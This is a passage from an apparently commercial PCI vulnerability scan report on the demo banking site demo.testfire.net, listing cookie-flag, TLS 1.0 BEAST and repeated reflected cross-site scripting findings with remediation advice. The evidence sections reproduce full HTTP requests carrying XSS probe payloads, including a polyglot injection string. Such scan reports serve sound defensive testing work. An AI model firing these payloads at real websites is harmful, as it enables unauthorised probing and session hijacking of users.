attacker will then try to steal cookies of various users by employing
multiple attacks. If successful, he/she may be able to get sensitive
information which can be further used in an illegitimate way.

CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29

Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = b95638afc2ebb1aeee06e0a48503002c
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Secure flag must be set for Session Cookies for Application served over

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 469 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.

152 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/8443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.

CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 470 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA

Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.

153 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2


815650642.00037%29%3C%2Fscript%3E
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 471 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
All Cross-Site Scripting vulnerabilities are considered non-compliant by
PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650642.00037)</script>
Detection: An alert was detected containing 15650642.00037
Request: GET
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 472 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

154 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117/sendFeedback


Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 473 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650656.00407)</script>
Detection: An alert was detected containing 15650656.00407

Request: POST http://65.61.137.117/sendFeedback HTTP/1.1


Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650656.00407%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 474 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

155 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net:8080/sendFeedback


Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 475 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net:8080/sendFeedback - name
Injection: <script>alert(15650659.00577)</script>
Detection: An alert was detected containing 15650659.00577

Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1


Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650659.00577%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 476 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

156 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117:8080/sendFeedback


Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 477 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
All Cross-Site Scripting vulnerabilities are considered non-compliant by
PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617

Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1


Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 478 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
2F*&subject=_WSETESTDATA&comments=_WSETESTAREADATA&subm
it=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

157 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117:8443/sendFeedback


Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 479 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617

Request: POST https://65.61.137.117:8443/sendFeedback HTTP/1.1


Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 480 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00617%29%2F%
2F%3E*%2Falert%2815650661.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

158 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117:8443/index.jsp?content=javascript%3A


%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ft
extarea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%
29%2F%2F%3E*%2Falert%2815650661.00127%29%2F*
Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 481 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 482 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00127)//>*/alert(15650661.00127)/*
Detection: An alert was detected containing 15650661.00127

Request: GET
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

159 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117:8080/util/serverStatusCheckService.jsp?H


ostName=%3Cscript%3Ealert%2815650660.00947%29%

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 483 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
3C%2Fscript%3E
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 484 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/util/serverStatusCheckService.jsp?HostNam
e=%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650660.00947)</script>
Detection: An alert was detected containing 15650660.00947
Request: GET
http://65.61.137.117:8080/util/serverStatusCheckService.jsp?HostNam
e=%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://65.61.137.117:8080/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 485 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

160 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert


%2815650660.00037%29%3C%2Fscript%3E
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 486 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 487 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

161 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net/util/serverStatusCheckService.jsp?Host


Name=%3Cscript%3Ealert%2815650660.00947%29%3C%2Fs
cript%3E
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

